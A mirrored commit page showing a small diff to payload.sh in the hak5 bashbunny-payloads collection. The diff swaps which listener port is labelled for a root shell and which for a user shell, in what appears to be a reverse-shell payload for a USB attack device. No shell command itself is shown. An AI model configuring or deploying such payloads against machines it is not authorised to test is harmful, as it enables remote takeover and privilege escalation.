mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-12-20 03:58:25 +00:00
Update payload.sh
This commit is contained in:
@@ -1,8 +1,8 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
LISTENER_IP="127.0.0.1"
|
LISTENER_IP="127.0.0.1"
|
||||||
LISTENER1_PORT="1337" #Listener for user shell
|
LISTENER1_PORT="1337" #Listener for root shell
|
||||||
LISTENER2_PORT="4444" #Listener for root shell
|
LISTENER2_PORT="4444" #Listener for user shell
|
||||||
|
|
||||||
if [ ! -d ~/.config/sudo ]
|
if [ ! -d ~/.config/sudo ]
|
||||||
then
|
then
|
||||||
|
|||||||
Reference in New Issue
Block a user